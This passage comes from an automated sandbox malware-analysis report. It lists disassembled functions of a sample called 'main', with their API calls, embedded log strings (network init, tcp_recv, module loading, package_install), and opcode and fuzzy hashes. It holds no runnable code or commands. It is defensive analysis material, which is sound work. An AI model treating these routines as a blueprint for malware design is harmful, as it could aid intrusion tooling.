                    • API ID: ErrorLastrecv
                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                    • API String ID: 2514157807-65069805
                    • Opcode ID: e17e57d39b6d0bf0619066593cd494d760b0a37cd43b7cfbc4e2e11104ea388d
                    • Instruction ID: 8612ae7a319476ee1dd1359d32faf91321d0e089fa5f2a727600c1cc5392ec67
                    • Opcode Fuzzy Hash: e17e57d39b6d0bf0619066593cd494d760b0a37cd43b7cfbc4e2e11104ea388d
                    • Instruction Fuzzy Hash: B6115E58E0E61751FA245BACE8612B873516F457F0F504330DF2D9AEE2DE2CF9568700
                    Function 00007FF8BFB820EA Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: ErrorLastrecv
                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                    • API String ID: 2514157807-65069805
                    • Opcode ID: cfbec3d80268c92a210721fa65bb7f648b19debdc5ac0ec43750b3102544e305
                    • Instruction ID: 733571e87d911fb63e6a8d039384a8577a09b5653d95f4aebb2b4d5b36266879
                    • Opcode Fuzzy Hash: cfbec3d80268c92a210721fa65bb7f648b19debdc5ac0ec43750b3102544e305
                    • Instruction Fuzzy Hash: 94110D50A0C51BC1F925A7ADEC406B42751AF857E4F619331EB2D9AAE6DE1CA546C300
                    Function 00007FF8BFAB1C0A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: ErrorLastrecv
                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                    • API String ID: 2514157807-65069805
                    • Opcode ID: 5924ac5f7febb98cc3b4509505359a6d1b94a50e864779fcb44e8b3ea3085f99
                    • Instruction ID: 84c6bf82b8ae7ec4efc574316a9bb254f5d30fc2cf0aa66d6abfb0f1fb7d183c
                    • Opcode Fuzzy Hash: 5924ac5f7febb98cc3b4509505359a6d1b94a50e864779fcb44e8b3ea3085f99
                    • Instruction Fuzzy Hash: FF116050B0C91B46E628579CAC472741754AF427ECF60B331DF7DA66E7EE1CAA4A8300
                    Function 00007FF8BA502A1A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: ErrorLastrecv
                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                    • API String ID: 2514157807-65069805
                    • Opcode ID: 687b881fdd348855cd9be93875ebccf1f6286ced463390f6bf4ec4fd153eb7a4
                    • Instruction ID: d3cf295cdf84b9c31fd8e00d17b438f10cd899c39070896c8f9524bd313d25d8
                    • Opcode Fuzzy Hash: 687b881fdd348855cd9be93875ebccf1f6286ced463390f6bf4ec4fd153eb7a4
                    • Instruction Fuzzy Hash: F5118F60A0C51BD1FA71539DAC9027A12406F437F8F4053B5DF2E8A6F6EE5CAB479300
                    Function 00007FF8B918559A Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 50networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: ErrorLastrecv
                    • String ID: [D] (%s) -> Disconnected(sock=0x%llx)$[E] (%s) -> Invalid arguments(sock=0x%llx,p=0x%p,l=%d)$[E] (%s) -> recv failed(sock=0x%llx,WSAgle=%d)$tcp_recv
                    • API String ID: 2514157807-65069805
                    • Opcode ID: 71b248d79f63e3ad16b9781f2f0d4f3c64fd26030b2f447712807f0f8b8b6e07
                    • Instruction ID: 54a49b6cc683f7c40f87477be9d2cc4f61832e5d9d7b78cc60b8f4c376eb720c
                    • Opcode Fuzzy Hash: 71b248d79f63e3ad16b9781f2f0d4f3c64fd26030b2f447712807f0f8b8b6e07
                    • Instruction Fuzzy Hash: 41118251E0C69755F9105F1CA8806B82751AF407F4FA24370DE2D8A5E3FE2CA947B300
                    Function 00007FF708871694 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 28libraryCOMMON
                    Download Yara Rule
                    APIs
                    • LoadLibraryA.KERNEL32(?,?,service,000001B9FFF913D0,00007FF708879404), ref: 00007FF7088716A2
                    • GetLastError.KERNEL32(?,?,service,000001B9FFF913D0,00007FF708879404), ref: 00007FF7088716CE
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: ErrorLastLibraryLoadfflushfwrite
                    • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load$service
                    • API String ID: 4085810780-4145076245
                    • Opcode ID: 89ebc8c7e4f33d3e928f190608cae1c99765822385c71e9f94217e9abe4ccd82
                    • Instruction ID: 97da014fc2c1b1e2b78b283ada72f60c4022a33d1cb1f0a37939f7fdd38649d9
                    • Opcode Fuzzy Hash: 89ebc8c7e4f33d3e928f190608cae1c99765822385c71e9f94217e9abe4ccd82
                    • Instruction Fuzzy Hash: C1F03014A69A1781ED56F75AAC54DB4E6606F14BC4BC80431C90C167E5EF2CF5E9C324
                    Function 00007FF8BFB52F1E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: Startupfflushfwrite
                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                    • API String ID: 3771387389-898331216
                    • Opcode ID: b8168152bed2fe7015a620b0f98054066fbf806d0659ad2a0f81c7eb32b1367f
                    • Instruction ID: f0ea31f1393bbd3c6069edb4790f1a16193920fb1262d7ac86831144697b9986
                    • Opcode Fuzzy Hash: b8168152bed2fe7015a620b0f98054066fbf806d0659ad2a0f81c7eb32b1367f
                    • Instruction Fuzzy Hash: 78F01D64B09647A2FF109BA8F8547F8B310EF283C4F480032DA0D46A96EE2CF5998740
                    Function 00007FF8BFB824AE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: Startupfflushfwrite
                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                    • API String ID: 3771387389-898331216
                    • Opcode ID: 6874982133632a7ce170ad8de51c3a9715c6612822ec66ea62388de5787a52fb
                    • Instruction ID: f6bb3900cc5fa06af7d005c086b550636cc520a7a578f6d5ee7aeefdd211cabe
                    • Opcode Fuzzy Hash: 6874982133632a7ce170ad8de51c3a9715c6612822ec66ea62388de5787a52fb
                    • Instruction Fuzzy Hash: 87F03A60B0A507D5FB14ABDCE8447F46351AF903C4F44C432DB0D8A6ABEE1CE649C310
                    Function 00007FF8B9152DDE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: Startupfflushfwrite
                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                    • API String ID: 3771387389-898331216
                    • Opcode ID: 91b5b12ed51ae55352934baa0b39f4641da89fbc1b278aeeed348b83f169e717
                    • Instruction ID: c19971c05cbf812be55a9f138efdf6a74e98d668463b3de981aef0ba04bf7787
                    • Opcode Fuzzy Hash: 91b5b12ed51ae55352934baa0b39f4641da89fbc1b278aeeed348b83f169e717
                    • Instruction Fuzzy Hash: 56F09061F0848391FB139F1CE9403F52311AF143C8F458432DA8D961D6EE5DF548E700
                    Function 00007FF8BFAB1FCE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543205209.00007FF8BFAB1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFAB0000, based on PE: true
                    • Associated: 00000016.00000002.4543176156.00007FF8BFAB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543229217.00007FF8BFAC0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543258072.00007FF8BFAC8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543280015.00007FF8BFACB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                    • Associated: 00000016.00000002.4543353485.00007FF8BFACC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfab0000_main.jbxd
                    Similarity
                    • API ID: Startupfflushfwrite
                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                    • API String ID: 3771387389-898331216
                    • Opcode ID: 55581a1a9876ac671bbe8439d1a613f18c012bce2b1d742a23fc00ce54db1969
                    • Instruction ID: e41fd803ae0d831ac02f78de2496be5e186a99b58f539ebffcfbb1a52028dcdf
                    • Opcode Fuzzy Hash: 55581a1a9876ac671bbe8439d1a613f18c012bce2b1d742a23fc00ce54db1969
                    • Instruction Fuzzy Hash: CDF06DA0B0890B95FB199B9DEC033F42360AF107CCF84A032DB0D9A5A6EE1DE94D9700
                    Function 00007FF8BA502DDE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543038707.00007FF8BA501000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA500000, based on PE: true
                    • Associated: 00000016.00000002.4543016103.00007FF8BA500000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543075522.00007FF8BA513000.00000002.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543104552.00007FF8BA51C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543126131.00007FF8BA51F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                    • Associated: 00000016.00000002.4543151844.00007FF8BA520000.00000008.00000001.01000000.0000000D.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8ba500000_main.jbxd
                    Similarity
                    • API ID: Startupfflushfwrite
                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                    • API String ID: 3771387389-898331216
                    • Opcode ID: 9adf5fa366108badb66f3825d14c001fe3316979c7670eb6608d00b3c87b209d
                    • Instruction ID: 0d46eb1752f6a6fdbf0428f27402baa44d98cd525241c953360672836e0643d3
                    • Opcode Fuzzy Hash: 9adf5fa366108badb66f3825d14c001fe3316979c7670eb6608d00b3c87b209d
                    • Instruction Fuzzy Hash: 9CF04971A0C607E1FB619B9DEC90BF62310AF163D4F8405B2DE0E4A1A6EE5DE7498700
                    Function 00007FF8B918595E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542875243.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                    • Associated: 00000016.00000002.4542850884.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542909887.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542940731.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542967259.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                    • Associated: 00000016.00000002.4542988009.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                    Similarity
                    • API ID: Startupfflushfwrite
                    • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                    • API String ID: 3771387389-898331216
                    • Opcode ID: a26de81fc8445dc42c5ba4472ba58619277b91e3ccb05bf8742dbed8f743adb0
                    • Instruction ID: 63214778dc4ae82594cbb90f9f7f2f58423604ba7d17166605554c248d60c0b4
                    • Opcode Fuzzy Hash: a26de81fc8445dc42c5ba4472ba58619277b91e3ccb05bf8742dbed8f743adb0
                    • Instruction Fuzzy Hash: 21F01D62F1848391FB15DF1DE8857F56312EF107C4F858872DA0D866A6FE2CE54AB300
                    Function 00007FF8BFB83AFD Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 127sleepCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID: /$[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u)$[W] (%s) -> Not a valid packet received(size=%u,suid=%llx)$routine_rx
                    • API String ID: 3472027048-1600310168
                    • Opcode ID: c53c2ae821d90da87844032103b56b71391d742219771a0656b4b1393a371080
                    • Instruction ID: aeeecdef5614607cbd047c1b8e56cd6fa7201cb0db8a5aaa538225dac1b71d08
                    • Opcode Fuzzy Hash: c53c2ae821d90da87844032103b56b71391d742219771a0656b4b1393a371080
                    • Instruction Fuzzy Hash: 4B515F66E0D64385FA609B9CE8803B96391EFC43E4F588231D7AD466D6DF2CE855C700
                    Function 00007FF70887836F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4541095826.00007FF708871000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF708870000, based on PE: true
                    • Associated: 00000016.00000002.4541064552.00007FF708870000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541124486.00007FF708880000.00000002.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF708888000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541158347.00007FF70888A000.00000004.00000001.01000000.00000008.sdmpDownload File
                    • Associated: 00000016.00000002.4541209081.00007FF70888E000.00000002.00000001.01000000.00000008.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff708870000_main.jbxd
                    Similarity
                    • API ID: strlen$HandleModule_mbscpy
                    • String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
                    • API String ID: 3656010895-1379287937
                    • Opcode ID: 25beba7f4bd3a7add4e3bc7d0c1407a8b4a87d1fbaf1f0616fdca498130ef8a9
                    • Instruction ID: 3cb3d26df2352cb5fdc65edacb5a9af1499843c423203cc943c56ef04e38f2e8
                    • Opcode Fuzzy Hash: 25beba7f4bd3a7add4e3bc7d0c1407a8b4a87d1fbaf1f0616fdca498130ef8a9
                    • Instruction Fuzzy Hash: A2317F2262CA8791EB10EA58EC847EAE370EF84344FD00032E64D477D9DF6DD9A9C758
                    Function 00007FF8BFB520F3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543398310.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                    • Associated: 00000016.00000002.4543375448.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543427892.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543457057.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543478360.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543503770.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                    • Associated: 00000016.00000002.4543526307.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    • Opcode ID: 27f23b630b3fee3274bf3a028bcd2db1b972005ed87ce814cecee143b722bf30
                    • Instruction ID: fae7ac3dbad79c597fe4d217e641ad54cc7271e936c11fb84b882320d7f2aae3
                    • Opcode Fuzzy Hash: 27f23b630b3fee3274bf3a028bcd2db1b972005ed87ce814cecee143b722bf30
                    • Instruction Fuzzy Hash: 8FF08CA0A0A747A2FE11AB8DFC101AAB3116F14BC4F084131DF4D4BFA9EE3CE5968304
                    Function 00007FF8BFB84423 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4543573276.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                    • Associated: 00000016.00000002.4543552020.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543603877.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543623077.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543647847.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543666942.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543695367.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                    • Associated: 00000016.00000002.4543713581.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    • Opcode ID: 68bf0edd847036089264eecb137d1ff2ce4657a0f68d27ac68f5b67825259f4b
                    • Instruction ID: 9f70e605161bd8623a0eaa56368520d6a4881b57f18ce1d1a9cb370e472f958a
                    • Opcode Fuzzy Hash: 68bf0edd847036089264eecb137d1ff2ce4657a0f68d27ac68f5b67825259f4b
                    • Instruction Fuzzy Hash: C0F08190A4E60781FA159BDDBC045B563916F84BD4F089131DE5D4B7A9EF2CE546C300
                    Function 00007FF8B915CF13 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000016.00000002.4542713133.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                    • Associated: 00000016.00000002.4542690399.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542749406.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542780347.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542800996.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                    • Associated: 00000016.00000002.4542827161.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                    Similarity
                    • API ID: AddressErrorLastProcfflushfwrite
                    • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                    • API String ID: 1224403792-3063791425
                    • Opcode ID: 8500f81bbe417212a047b71eb08b57ae0d8934d82496b1388f00adba82d6eef3
                    • Instruction ID: a0d3e14684ce60c442c6588e1570c75b32d2bee1be4b590268df4a59fd05547b
                    • Opcode Fuzzy Hash: 8500f81bbe417212a047b71eb08b57ae0d8934d82496b1388f00adba82d6eef3
                    • Instruction Fuzzy Hash: 6BF0A490E097C382FA565F5EE8101B96351AF45FC4F558132EE4D4B799EF2CE686A300
